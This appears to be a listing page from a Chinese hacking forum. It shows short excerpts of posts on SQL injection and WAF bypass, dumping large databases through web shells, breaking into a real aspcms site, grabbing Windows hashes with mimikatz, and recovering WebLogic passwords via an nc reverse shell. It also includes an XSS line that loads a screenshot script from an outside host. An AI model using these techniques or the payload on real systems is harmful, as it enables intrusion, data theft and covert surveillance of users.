渗透测试
uc + xss 实现android远程定位追踪
1:前言 当PC时代的辉光逐渐隐入了暮霭,一轮更加炫目的红日正在缓缓升起,时至今日,移动互联网已经成为引领时代发展与前沿技术不断革新的中流砥柱,短短十数年间,手机的兴盛就超出了所有人的预料,大海淘沙,洗尽多少红尘铅华,新的思想,新的技术如雨后春笋般,让人目不暇接。智能化网络、云计算
攻击JavaWeb应用[1-7]
攻击JavaWeb应用-JavaEE 基础攻击JavaWeb应用-CS交互安全攻击JavaWeb应用-SQL注入攻击JavaWeb应用-SQL注入攻击JavaWeb应用-MVC安全攻击JavaWeb应用-程序架构与代码审计攻击JavaWeb应用-Server篇AttackJavaWeb.swf-----------------------------------------------------------------------------------
在SQL注入中利用MySQL隐形的类型转换绕过WAF检测
挺好的,看完后就想给大家分享。图片太多了,实在不好传啊。感谢管理员或是版主贴的图片(没显示谁编辑的帖子)完了,在本帖多交流。先分享点个人心得,心得版权归t00ls。:有的输入框会限制字符长度。但是你的注入语句很长,已经超出了它限制输入的长度,怎么办呢?有办法,你把源代码保存到本地。本
【我爱T00LS】SQL大型网络脱裤
首先声明上述两种方法,有很多朋友已经知道或有更好的办法脱裤。关于脱裤我个人观点是能简单则简单 先声明大致脱裤环境“1:准备脱裤数据量在千万级别 2:有WEB端SHELL 3:数据库服务器在内网只允许WEB端IP登录等 4:无ROOT密码 5:WEB端无法提权“ 1:Navicat 这个软件有个很有特色的连接方式,http隧
大自然的搬运工,觉得实在不错,才转载的,linux渗透
我只是大自然的搬运工,觉得实在不错,才转载的,linux渗透因为网站较多,就先用wvs扫一遍、然后等结果。如图,确实有些缺陷,用网站弱口令来进行测试。并且能成功的登陆后台。(前期用google浏览器无法直接登陆,换IE即可)突破上传:正常情况下是无法进行上传以.jpg,gif,png之外的文件,使用burp sui
【我爱T00LS】小计一次X战过程 很菜的过程
昨天才到学校就看见又要封号了{:6_446:} 小计一次X站过程 某人朋友发来一站点,叫上俺一起搞 在域名后面 一同乱扫, 找到后台 一看是aspcms, 试了试公开的EXP 注入无效··果断下载源码, 分析 查看了默认数据库为data/%23data.asp 在站上测试了一下,果断找到了 数据库, 进去之后找到密码 开
利用XSS截取屏幕截图
文章来源:y35u2个月前,长短短(Sogili)在群里发了一个html2canvas.js 并给了一个POC我写了一个完整的js来获得对方的屏幕截图看代码document.write("<script src=\"http:\/\/xj.hk\/html2canvas.js\"><\/script>"); <br>//调用截屏核心功能js,下载地址:http://xj.hk/html2canvas.js window.onload
windows server 2008 DOS下抓hash
0x001 啰嗦篇 在参透的时候我们遇见windows server 2008都比较头疼,毕竟不熟悉的系统,提权也比较麻烦,成功率切低。 偶尔成功提权,但不见得能添加用户,又或者管路员经常在线的情况下我们首选抓HASH,这样安全且保险。 这样我们就必须用到工具抓hash 或者抓明文了。应允而生的工具就出现了 mimikat
Weblogic 10 jdbc连接串密码破解 linux下亲测可用
大家最近搞了很多jsp的站吧,肯定遇到了使用jdbc连接数据库的,我也遇到了一个,和大家分享下破解jdbc加密的方法,我测试的是weblogic 10.3,linux环境,成功得到明文的数据库密码。参考资料:http://www.2cto.com/Article/201305/207375.html1、首先,用nc反弹,执行set命令,查看DOMAIN_HOME路径2、
《渗透ORACLE11g》pdf
有好多兄弟找我要pdf,这里贴出来方面下载oracle11g.swf
